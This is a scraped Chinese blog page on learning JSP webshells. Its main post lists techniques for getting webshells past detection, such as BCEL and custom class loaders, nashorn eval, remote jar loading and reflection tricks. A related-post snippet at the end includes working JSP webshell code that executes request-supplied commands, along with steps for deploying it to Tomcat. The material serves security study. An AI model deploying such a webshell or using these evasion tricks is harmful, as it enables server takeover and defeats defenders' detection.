JSP webshell学习

最新推荐文章于 2024-03-02 22:47:58 发布

caiqiiqi

最新推荐文章于 2024-03-02 22:47:58 发布

阅读量1.3k

点赞数

分类专栏： java 安全

本文链接：https://blog.youkuaiyun.com/caiqiiqi/article/details/109000744

版权

安全同时被 2 个专栏收录

258 篇文章

订阅专栏

java

206 篇文章

订阅专栏

参考：

JSP-Webshells集合
都0202年了老嗨还在用的 - 各种姿势jsp webshell

原理总结

使用com.sun.org.apache.bcel.internal.util.ClassLoader加载BCEL格式的字节码
自定义ClassLoader，在findClass方法中硬编码类的字节码的base64，然后loadClass
利用new ScriptEngineManager().getEngineByName(“nashorn”)#eval执行任意代码
使用URLClassLoader加载远程jar包然后loadClass（依赖出网）
jdk自带的javac动态编译代码，代码可以被加密以规避检测
使用特殊的类加载器jdk.nashorn.internal.runtime.ScriptLoader
使用内部类绕检测java.lang.ProcessImpl
使用内部类绕检测java.lang.ProcessBuilder
使用sun.reflect.MethodAccessor#invoke绕过对java.lang.reflect.Method#invoke的检测
利用java的spi机制在不出网的情况下URLClassLoader加载base64编码后的jar包（临时目录）
使用TemplatesImpl绕过对ClassLoader的检测
重写ObjectInputStream的resolveClass的方法，然后对其readObject实现RCE

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

caiqiiqi

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Webshell 高级样本收集

07-31

4万+

收集样本，那可是一件很有趣的精细活。从样本里，你可能会发现很多技巧，并进入另一个视角来领略攻击者的手法。当在安全社区里看到一些比较高级的Webshell样本，就如同发现宝藏一般欣喜，我会...

JSPwebshell

08-21

忍痛分享啊。

参与评论您还未登录，请先登录后发表或查看评论

JSP的WebShell

weixin_34414650的博客

07-26

661

2019独角兽企业重金招聘Python工程师标准>>> ...

JSP-Webshells全套汇总

09-29

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。

Javaweb安全——JSP Webshell

weixin_43610673的博客

08-22

7145

public static class x extends ClassLoader //继承ClassLoader {#恶意类字节码 BASE64Decoder code = new sun . misc . BASE64Decoder();//将base64解码成byte数组，并传入自定义类的get函数 System . out . println(result . newInstance());}.

jsp webshell

02-19

根据by 慈勤强 JFolder改编，完善了部分功能有bug的地方。

JSP webshell免杀——webshell免杀

weixin_46601374的博客

06-29

3859

好搞笑，我身边的人省护期间天天提到许少，听说是一个很厉害的大佬。结果我免杀跟着学的视频就是这位大佬的。更离谱的是，聪哥说我们是见过许少的，就是上次给红队整理报告的时候，他就在。果然，实习就是好，传说中的大佬们就在身边——虽然我都不认识，但是还是感觉好厉害。来吧，开始学习免杀首先就是最简单的一句话木马：太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木马，分开来写沙箱是通过了✌但是cmd=ipconfig是什么都不出的，netstat -ano也是。再次修改代码中间

机器学习-检测webshell

07-18

基于决策树的webshell检测，k-近邻算法是基于实例的学习，使用算法时我们必须有接近实际数据的训练样本数据，k-近邻算法必须报错全部数据集，如果训练数据集的很大必须使用大量的存储空间，此外，由于必须对数据...

JSP Webshell实现技术探究与安全研究

资源摘要信息: "JSP Webshell是利用Java Server Pages (JSP) 技术实现的Web后门。在本资源中，我们收集了多种实现JSP Webshell的方法，以供安全研究人员和内部审计使用。注意：这些工具只能用于安全测试和学习目的，...

基于 python机器学习NB算法实现基于文本的WebShell检测工具

10-03

【作品名称】：基于 python机器学习NB算法实现基于文本的WebShell检测工具【适用人群】：适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。【项目...

webshell -真实可用的jsp 马

03-30

网上很多一句话、webshell 各种原因导致不能用，亲测可用的大马，忍痛割爱与大家分享

JSP的WEBSHELL源代码

11-21

上传或是用其他方式注入到别人系统，用此webshell攻击别人系统，提供各种网络协议的连接

webshell.jsp

12-30

webshell.jsp JSP shell

两个JSP Web Shell

03-23

NULL 博文链接：https://sheng.iteye.com/blog/1033770

script webshell jspWebShell / pythonWebShell / phpWebShell

03-24

NULL 博文链接：https://lindows.iteye.com/blog/1076021

认识JSP webshell免杀

xlsj雪松的博客

08-19

1439

Tomcat运行这就是一个典型的webshell，但这个webshell的各种特征已经被安全检测平台记录，很容易识别出来。【D盾】【shellpub】接下来进行免杀，免杀就是将这些被识别的特征进行替换，绕过，混淆和干扰。

Webshell免杀-JSP

qq_55787787的博客

10-15

3429

JSP免杀马的基本免杀方式。

Deformity JSP Webshell、Webshell Hidden Learning

weixin_34146805的博客

03-14

190

catalogue 1. JSP基础语法 2. JSP Lexer By Lua 3. Open Source Code Analyzers in Java 4. WEBSHELL Samples 5. shell样本特征提取 1. JSP基础语法 0x1: 脚本程序脚本程序可以包含任意量的Java语句、变量、方法或表达式，只要它们在脚本语言中是有效的脚本程...

jsp webshell 初识

weixin_50217210的博客

03-02

512

访问得到os.name的信息代码中可以接收参数cmd 我们提供参数看看 cmd=ipconfig。没问题这里（只是我测试的时候没有处理图片，就不放置了）很有可能是字节输出的代码被检测到了，我们删除了看一下。果然，删除以后检测不到了，那我们想办法绕过。之前是执行exec参数，这次是可疑文件。放到IDEA中webapp下测试一下。在D盾跑还是被检测到了，换一种方式输出字节流。

怎么运行jsp的webshell

最新发布

01-09

### 部署和运行 JSP WebShell 的过程 JSP WebShell 是一种嵌入到 Java Server Pages (JSP) 文件中的恶意代码，能够执行操作系统命令。下面介绍如何在 Web 服务器上部署并测试一个简单的 JSP WebShell。 #### 准备工作环境为了成功部署和运行 JSP WebShell，需要确保已经安装配置好支持 JSP 页面解析的 Web 容器，比如 Apache Tomcat 或者 Jetty 等[^1]。 #### 创建 JSP WebShell 文件创建一个新的 .jsp 文件，在其中编写如下所示的一段代码： ```jsp <%@ page import="java.io.*, java.util.*"%> <% if ("cmd".equals(request.getParameter("action"))) { String cmd = request.getParameter("command"); Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null){ out.println(line); } } %> ``` 这段代码定义了一个可以接收 HTTP 请求参数 `action` 和 `command` 的页面逻辑，当接收到特定请求时会尝试去调用操作系统的 shell 命令并将输出返回给浏览器显示。 #### 将文件放置于 Web 应用目录下把上述编写的 JSP 文件上传至已启动的服务端应用程序根路径下的某个子目录内，例如 `/var/lib/tomcat9/webapps/ROOT/shell.jsp` 对应 Linux 上默认情况下 Tomcat 的 webapp 路径设置；对于 Windows 则可能是类似于 `C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\shell.jsp` 这样的位置。 #### 测试访问效果通过浏览器或者其他 HTTP 工具向该 URL 发送带有相应参数值的 GET 或 POST 请求来进行验证，如 http://localhost:8080/shell.jsp?action=cmd&command=whoami ，这将会触发服务端执行 whoami 指令，并将结果反馈回客户端展示出来。请注意，以上内容仅用于安全研究目的的学习交流，请勿非法入侵任何计算机信息系统！